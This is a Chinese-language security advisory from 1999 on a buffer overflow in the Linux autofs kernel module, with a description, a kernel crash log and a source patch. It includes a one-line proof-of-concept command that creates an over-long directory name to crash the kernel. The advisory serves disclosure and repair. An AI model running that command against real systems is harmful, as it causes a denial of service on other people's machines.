发布日期：1999-03-18
更新日期：1999-03-18

受影响系统：

Linux autofs kernel module in linux-2.0.36 to 2.2.1

描述：

---

问题类型: 核心模块的溢出漏洞。

Autofs Kernel模块在接收目录名前没有检测名称长度，普通用户可能尝试
进入超过255个字符的目录。这将改写内存(可能是内核堆栈或者其他),导致
核心出错或使机器从新启动。




测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

在linux下：
[balif@localhost misc]# cd `perl -e 'print "x" x 255'`
bash: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:
No such file or directory

[balif@localhost misc]# cd `perl -e 'print "x" x 256'`
invalid operand: 0000
CPU:    0
EIP:    0010:[<c0155b00>]
EFLAGS: 00010282
eax: 00000000   ebx: c2a90c20   ecx: c265904c   edx: c0000000
esi: c29d3b00   edi: c2928000   ebp: c260d940   esp: c26c5ee8
ds: 0018   es: 0018   ss: 0018
Process bash (pid: 360, process nr: 21, stackpage=c26c5000)
Stack: 00000000 00000000 c260d940 c260d900 00000286 c0154c58 c0154ca8
c2928000 c260d940 c2928000 c260d900 c2659d50 c26cd3a0 00000286 c0154def
c260d900 c029c000 c2928000 c2659d9c c260d900 c2659d50 c0154ef7 c260d900
c260d900 c029c000 c2928000 c2659d9c c260d900 c2659d50 c0154ef7 c260d900
c260d900
Call Trace: [<c0154c58>] [<c0154ca8>] [<c0154def>] [<c0154ef7>] [<c0128759>]
[<c0128912>] [<c01289e9>] [<c012126e>] [<c0107a40>]
Code: fe ff ff 83 c4 08 eb 03 ff 43 1c 8b 7c 24 1c 83 7f 0c 00 74
- -{Shell dies}-

/var/log/messages
Feb 16 23:09:13 localhost automount[1361]: attempting to mount entry
/misc/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxq%^D^HH#

                                  ^_ 缓冲区已经溢出



建议：

---

1. 快速解决方法是限制目录名长度在255字符内，然后修补 /usr/src/linux-2.2.1/fs/autofs/root.c.

以下是修补程序代码：

- --- root.c.orig Thu Feb 18 20:26:23 1999
+++ root.c      Thu Feb 18 20:26:17 1999
@@ -217,6 +217,11 @@
        DPRINTK(("autofs_root_lookup: name = "));
        autofs_say(dentry->d_name.name,dentry->d_name.len);

+     /* quick patch by balif@nacs.net 2-18-99 */
+     /* Prevents overflow of pkt.name in waitq.c:autofs_notify_daemon() */
+        if (dentry->d_name.len > 255)
+               return -ENAMETOOLONG;
+
        if (!S_ISDIR(dir->i_mode))
                return -ENOTDIR;



浏览次数：19338
严重程度：0（网友投票）